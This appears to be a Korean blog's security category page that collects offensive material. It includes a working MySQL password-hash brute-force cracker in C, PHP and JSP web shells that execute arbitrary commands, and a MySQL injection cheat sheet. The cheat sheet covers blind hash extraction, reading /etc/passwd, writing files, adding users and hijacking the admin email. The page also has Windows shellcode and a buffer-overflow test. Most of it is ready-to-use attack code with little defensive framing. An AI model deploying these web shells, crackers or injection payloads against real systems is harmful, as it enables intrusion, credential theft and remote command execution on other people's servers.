반응형
반응형
'Security' 카테고리의 다른 글
| mysql hash cracker... (0) | 2008.10.02 |
|---|---|
| web shell (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |
Security
- http://www.greensql.com/ 2012.06.14
- mysql hash cracker... 2008.10.02
- web shell 2008.10.02
- MySQL Injection Cheat Sheet 2008.04.17
- ollydbg를 이용하여 p2p프로그램 분석 2008.04.17
- bof test 2008.04.17
- shellcode 2008.04.17
http://www.greensql.com/
2012. 6. 14. 10:02
mysql hash cracker...
2008. 10. 2. 00:41
반응형
/*
* This is a high-speed brute-force password cracker for MySQL hashed
* passwords. It can break an 8-character password containing any
* printable ascii characters in a matter of hours on an ordinary PC.
*
* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
* $ mysqlfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/
#include <stdio.h>
typedef unsigned long u32;
/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126
/* Maximum length of password */
#define MAX_LEN 12
#define MASK 0x7fffffffL
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
int i, c;
u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
u32 newstate1, newstate2, newstate3;
u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
i = -1;
sum = 7;
state1_ary[0] = 1345345333L;
state2_ary[0] = 0x12345671L;
while (1) {
while (i < stop) {
i++;
pass_ary[i] = MIN_CHAR;
step_ary[i] = (state1_ary[i] & 0x3f) + sum;
xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
sum += MIN_CHAR;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}
state1 = state1_ary[i+1];
state2 = state2_ary[i+1];
step = (state1 & 0x3f) + sum;
xor1 = step*MIN_CHAR + (state1 << 8);
xor2 = (state2 << 8) ^ state1;
for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
newstate2 = state2 + (xor1 ^ xor2);
newstate1 = state1 ^ xor1;
newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
div = (newstate1 & 0x3f) + sum + c;
diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
if (diff % div != 0) continue;
d = diff / div;
if (d < MIN_CHAR || d > MAX_CHAR) continue;
div = (newstate3 & 0x3f) + sum + c + d;
diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
if (diff % div != 0) continue;
e = diff / div;
if (e < MIN_CHAR || e > MAX_CHAR) continue;
pass_ary[i+1] = c;
pass_ary[i+2] = d;
pass_ary[i+3] = e;
return 1;
}
while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
sum -= MAX_CHAR;
i--;
}
if (i < 0) break;
pass_ary[i]++;
xor_ary[i] += step_ary[i];
sum++;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}
return 0;
}
void crack(char *hash)
{
int i, len;
u32 targ1, targ2, targ3;
int pass[MAX_LEN];
if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
printf("Invalid password hash: %s\n", hash);
return;
}
printf("Hash: %08lx%08lx\n", targ1, targ2);
targ3 = targ2 - targ1;
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
for (len = 3; len <= MAX_LEN; len++) {
printf("Trying length %d\n", len);
if ( crack0(len-4, targ1, targ3, pass) ) {
printf("Found pass: ");
for (i = 0; i < len; i++)
putchar(pass[i]);
putchar('\n');
break;
}
}
if (len > MAX_LEN)
printf("Pass not found\n");
}
int main(int argc, char *argv[])
{
int i;
if (argc <= 1)
printf("usage: %s hash\n", argv[0]);
for (i = 1; i < argc; i++)
crack(argv[i]);
return 0;
}
반응형
'Security' 카테고리의 다른 글
| http://www.greensql.com/ (0) | 2012.06.14 |
|---|---|
| web shell (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |
web shell
2008. 10. 2. 00:21
반응형
PHP 버전
<?
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
cmd : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR>\n<XMP>\n$result\n</XMP><HR>";
$command = str_replace("\\", "", $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>
JSP 버전
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
cmd.jsp?cmd=명령어 target=_blank>http://URL/cmd.jsp?cmd=명령어
반응형
'Security' 카테고리의 다른 글
| http://www.greensql.com/ (0) | 2012.06.14 |
|---|---|
| mysql hash cracker... (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |
MySQL Injection Cheat Sheet
2008. 4. 17. 03:04
반응형
MySQL Injection Cheat Sheet
Basics.
SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
Variations.
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
Blind injection vectors.
Operators
SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
Evaluate
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
Math
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);
Misc
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
Benchmark
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost
SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost
SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost
Using the timeout to check if user exists
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!
Gathering info
Table mapping
SELECT COUNT(*) FROM tablename
Field mapping
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
User mapping
SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
Advanced SQL vectors
Writing info into files
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'
Writing info into files without single quotes: (example)
SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))
Note: You must specify a new file, it may not exist! and give the correct
pathname!
The CHAR() quoteless function
SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)
Extracting hashes
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
example:
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login
explaining: (passwordfield,startcharacter,selectlength)
is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’
A quoteless example:
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122
Misc
Insert a new user into DB
INSERT INTO login SET user = 'r00t', pass = 'abc'
Retrieve /etc/passwd file, put it into a field and insert a new user
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'
Then login!
Write the DB user away into tmp
SELECT host,user,password FROM user into outfile '/tmp/passwd';
Change admin e-mail, for “forgot login retrieval.”
UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
Bypassing PHP functions
(MySQL 4.1.x before 4.1.20 and 5.0.x)
Bypassing addslashes() with GBK encoding
WHERE x = 0xbf27admin 0xbf27
Bypassing mysql_real_escape_string() with BIG5 or GBK
"injection string"
に関する追加情報:
the above chars are Chinese Big5
Advanced Vectors
Using an HEX encoded query to bypass escaping.
Normal:
SELECT * FROM login WHERE user = 'root'
Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
Inserting a new user in SQL.
Normal:
insert into login set user = ‘root’, pass = ‘root’
Bypass:
insert into login set user = 0×726F6F74, pass = 0×726F6F74
How to determin the HEX value for injection.
SELECT HEX('root');
gives you:
726F6F74
then add:
0x
before it.
http://www.v-nessa.net/2007/01/17/the-basic-mysql-injection-2
반응형
'Security' 카테고리의 다른 글
| mysql hash cracker... (0) | 2008.10.02 |
|---|---|
| web shell (0) | 2008.10.02 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |
| shellcode (0) | 2008.04.17 |
ollydbg를 이용하여 p2p프로그램 분석
2008. 4. 17. 03:00
반응형
invalid-file반응형
'Security' 카테고리의 다른 글
| mysql hash cracker... (0) | 2008.10.02 |
|---|---|
| web shell (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |
| shellcode (0) | 2008.04.17 |
bof test
2008. 4. 17. 02:51
반응형
소스코드
-----------------------------------------------
#include <stdio.h>
#include <windows.h>
/*
buffer[256byte] + [ebp 4byte] + [eip 4type] = 264byte
B_SIZE(264byte) = shellcode( 43byte = shellcode(42byte) + '\0'(1byte) ) + nop*217 (nop+ebp) + ret(eip='\x1c\x29\x42\x00' 4byte)
*/
char shellcode[] = "\x55\x8B\xEC\x33\xDB\x53\x56\x57\xC6\x45"
"\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"
"\x6A\x05\x8D\x45\xFC\x50\xB8\x6D\x13\x86"
"\x7C\xFF\xD0\x6A\x01\xB8\xDA\xCD\x81\x7C"
"\xFF\xD0";
#define B_SIZE 264
char str[B_SIZE];
int main(int argc, char *argv[])
{
char buffer[256];
char ret[] = "\x1c\x29\x42\x00";
// str address : 42291c -> \x1c\x29\x42\x00
memset(str,'\x90',B_SIZE); // x90으로 채우고,
memcpy(str, shellcode, sizeof(shellcode)); // shellcode를 넣는다.
memcpy(str+sizeof(shellcode)+217, ret, sizeof(ret));
// shellcode뒤 217개 만큼 nop를 지나서(ebp까지 덮어짐) eip값에 ret[]의 값을 넣는다.
memcpy(buffer, str, sizeof(str)); // buffer에 str를 덮는다.
printf("------------------------------------------------------------------------\n");
for(int i=0;i<sizeof(str);i++)
printf("[Count %3d] bufferAddr: %x <-> %10x : %10x <-> strAddr: %x \n", i, &buffer[i], buffer[i], str[i], &str[i]);
printf("------------------------------------------------------------------------\n");
printf("buffer address : %8x\n", buffer);
printf("str address : %8x\n", str);
printf("buffer size : %d\n", sizeof(buffer));
printf("str size : %d\n", sizeof(str));
printf("shellcode size : %d\n", sizeof(shellcode));
printf("------------------------------------------------------------------------\n");
return 0;
}
실행해보면...
반응형
'Security' 카테고리의 다른 글
| mysql hash cracker... (0) | 2008.10.02 |
|---|---|
| web shell (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| shellcode (0) | 2008.04.17 |
shellcode
2008. 4. 17. 02:50
반응형
#include <windows.h>
void main()
{
char buf[4];
buf[0] = 'c';
buf[1] = 'm';
buf[2] = 'd';
buf[3] = '\0';
WinExec(buf, SW_SHOW);
exit(1);
}
------------------------------------
exit()부근에 브포를 걸어주고 실행
00401010 push ebp
00401011 mov ebp,esp
00401013 sub esp,44h
00401016 push ebx
00401017 push esi
00401018 push edi
00401019 lea edi,[ebp-44h]
0040101C mov ecx,11h
00401021 mov eax,0CCCCCCCCh
00401026 rep stos dword ptr [edi]
5: char buf[4];
6:
7: buf[0] = 'c';
00401028 mov byte ptr [ebp-4],63h
8: buf[1] = 'm';
0040102C mov byte ptr [ebp-3],6Dh
9: buf[2] = 'd';
00401030 mov byte ptr [ebp-2],64h
10: buf[3] = '\0';
00401034 mov byte ptr [ebp-1],0
11:
12: WinExec(buf, SW_SHOW);
00401038 mov esi,esp
0040103A push 5
0040103C lea eax,[ebp-4]
0040103F push eax
00401040 call dword ptr [__imp__WinExec@8 (0042413c)]
00401046 cmp esi,esp
00401048 call __chkesp (00401250)
13:
14: exit(1);
0040104D push 1
0040104F call exit (004010c0)
------------------------------------
불필요한 부분은 제거하고
#include <windows.h>
void main()
{
__asm {
push ebp
mov ebp,esp
// xor추가하고
xor ebx,ebx
// end.
push ebx
push esi
push edi
mov byte ptr [ebp-4],63h
mov byte ptr [ebp-3],6Dh
mov byte ptr [ebp-2],64h
//mov byte ptr [ebp-1],0 <-- 삭제
push 5
lea eax,[ebp-4]
push eax mov eax, 0x7C86136D
call eax
push 1
mov eax, 0x7C81CDDA
call eax
}
}
-----------------------------------
xor연산으로 \x90을 없애는 작업을 해준다.
Dependency Walker으로 call 부분을 수정해야한다.
KERNEL32.DLL
IMAGE BASE : 0x7C800000
WINEXEC
ENTRY POINT: 0x0006136D
EXITPROCESS
ENTRY POINT: 0x0001CDDA
CALL WINEXEC: 0x7C800000 + 0x0006136D = 0x7C86136D
CALL EXITPORCESS : 0x7C800000 + 0x0001CDDA = 0x7C81CDDA
------------------------------------
디버깅환경에서 code bytes를 통해 바이너리 코드를
가져와서 보기 좋게 가공.
------------------------------------
#include <windows.h>
char shellcode[] = "\x55\x8B\xEC\x33\xDB\x53\x56\x57\xC6\x45"
"\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"
"\x6A\x05\x8D\x45\xFC\x50\xB8\x6D\x13\x86"
"\x7C\xFF\xD0\x6A\x01\xB8\xDA\xCD\x81\x7C"
"\xFF\xD0";
void main()
{
int *ret;
ret = (int *)&ret+2;
(*ret) = (int)shellcode;
}
반응형
'Security' 카테고리의 다른 글
| mysql hash cracker... (0) | 2008.10.02 |
|---|---|
| web shell (0) | 2008.10.02 |
| MySQL Injection Cheat Sheet (0) | 2008.04.17 |
| ollydbg를 이용하여 p2p프로그램 분석 (0) | 2008.04.17 |
| bof test (0) | 2008.04.17 |